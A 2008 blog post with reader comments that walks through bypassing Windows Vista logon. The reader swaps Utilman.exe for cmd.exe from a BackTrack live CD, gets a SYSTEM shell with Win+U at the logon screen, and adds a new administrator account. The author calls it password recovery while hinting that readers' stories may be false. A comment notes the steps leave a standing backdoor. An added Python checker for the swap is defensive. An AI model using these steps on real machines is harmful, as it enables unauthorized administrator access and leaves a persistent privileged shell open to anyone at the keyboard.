Hack Vista – Create a new admin account
PaulSpoerry | August 3, 2008
Why hack Windows passwords when you can simply create yourself a new Administrator account?
In a previous post I showed how you can use an Ophcrack Live CD to crack Windows passwords in minutes. I’ve done it before and it really works. The free, open source Ophcrack Live CD is a Windows account password cracking tool designed to help you recover lost Windows passwords. Quite a few people have sent me emails or contacted me via chat on my website saying “I forgot my password”, or “my kid locked himself out of his PC”. I’m unsure if that’s really the case or if they were just looking for a way to crack Windows passwords. However, if that is really the case, there is potentially a much faster way to resolve your issue… just create a new Administrator account!
To create a new Administrator account you’ll want to grab a copy of Offensive Security’s BackTrack Live CD, which can be found here.
What is BackTrack?
BackTrack is the result of the merging of two Innovative Penetration Testing live Linux distributions – Whax and Auditor. BackTrack has been dubbed as the best Security Live CD today, and has been rated 1st in its category, and 32nd overall in Insecure.org. Based on SLAX (Slackware), BackTrack provides user modularity. This means the distribution can be easily customised by the user to include personal scripts, additional tools, customized kernels, etc.
Here’s a quick and dirty way to make a new user account.
Boot into BackTrack and open a shell prompt:
- cd /mnt (change directory to mounted drives)
- ls (get the list of mounted drives)
- cd sda1 (sda1 is the main hard drive)
- cd Windows/ (change to the windows directory)
- cd System32/ (change to the system directory)
- mv Utilman.exe Utilman.old (backup original file)
- cp cmd.exe Utilman.exe (copy cmd.exe as utilman.exe)
- reboot
Once rebooted, at the Vista logon screen do the following:
- Press Windows key + U to invoke Utility Manager (a.k.a. cmd.exe)
- Cmd.exe will spawn with ‘System’ privileges.
- c:\>net user S00perAdmin mypassword /add
- c:\>net localgroup administrators S00perAdmin /add
- Reboot and log in with your newly added Admin account
There ya go… now instead of needing to “crack” your “lost” password you can simply create a new Administrator account, log in with that and then change the lost account’s password to what you want it to be.
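An added example, not part of the original post: a Python check that can be run from a live Linux session against a mounted System32 directory to see whether the Utilman.exe swap above is still in place. The function names and the constructed demo files are assumptions of this example.

```python
import hashlib
import sys
import tempfile
from pathlib import Path

def sha256(path):
    """Hash a file in chunks so large binaries are not read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def find_ci(directory, name):
    """Case-insensitive lookup: NTFS under Linux may show Utilman.exe or utilman.exe."""
    for entry in Path(directory).iterdir():
        if entry.name.lower() == name.lower() and entry.is_file():
            return entry
    return None

def check_utilman(system32):
    """Return a list of findings for the Utilman.exe swap described in this post."""
    findings = []
    utilman = find_ci(system32, "Utilman.exe")
    cmd = find_ci(system32, "cmd.exe")
    backup = find_ci(system32, "Utilman.old")
    if utilman is None:
        findings.append("Utilman.exe is missing")
    elif cmd is not None and sha256(utilman) == sha256(cmd):
        findings.append("Utilman.exe is byte-identical to cmd.exe")
    if backup is not None:
        findings.append("Utilman.old present (renamed original left behind)")
    return findings

def demo():
    """Build two constructed System32 directories (dummy bytes, not real binaries)."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, swapped = Path(tmp, "clean"), Path(tmp, "swapped")
        for d in (clean, swapped):
            d.mkdir()
            (d / "cmd.exe").write_bytes(b"constructed cmd bytes")
        (clean / "Utilman.exe").write_bytes(b"constructed utilman bytes")
        (swapped / "Utilman.old").write_bytes(b"constructed utilman bytes")
        (swapped / "utilman.exe").write_bytes(b"constructed cmd bytes")
        return check_utilman(clean), check_utilman(swapped)

if __name__ == "__main__":
    # Pass a mounted System32 path as the first argument, or run the demo.
    print(check_utilman(sys.argv[1]) if len(sys.argv) > 1 else demo())
```

An empty result only means Utilman.exe is not a byte-for-byte copy of the cmd.exe beside it and no Utilman.old was found; it does not prove the file is the genuine Microsoft binary.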
[...] simply “lost” their password. If that’s the case you can use some free tools to create a new Administrator account. With this account you can simply change the existing accounts password, use the new Admin account, [...]
This step-by-step instruction is incomplete. It leaves a copy of cmd.exe as utilman.exe and the hotkeys will continue to provide a system privilege command shell at the secure desktop login screen. It’s like a security/firedoor with multiple deadbolt locks (and a master key under the welcome mat).
[...] Hack Vista – Create a new admin account | PaulSpoerry.com Already posted yesterday as well. Easy, and it goes quickly [...]
[...] before but I found this. It’s about using a program BackTrack to somehow add new accounts? Hack Vista – Create a new admin account | PaulSpoerry.com [...]
If you create a new Admin account, what will happen to the old Admin account? Does that mean that there will be two Administrator accounts? Please reply ASAP. Thanks
You’d have both accounts. There is no issue with a Windows machine having multiple administrator accounts.
Hi there Paul,
I have a couple of questions regarding this method you’ve posted and would appreciate if you took the time to answer them.
First off, how likely is it that this solution would work on Windows 7?
Secondly,
c:\>net user S00perAdmin mypassword /add
Written like that, I assume the name of the account would be S00perAdmin followed by my password of choice – however, can I just ignore typing a password to leave it without one? (And is it always “localgroup administrators” or may it differ depending on region?)
Really appreciate you wrote this guide, hoping you’ll answer my questions as well,
Lenny.
Given that 7 is built off of Vista, it’s pretty damned likely. That said, I haven’t tried it myself.
You should never use an account without a password. If you need one without a PW use the built-in guest account.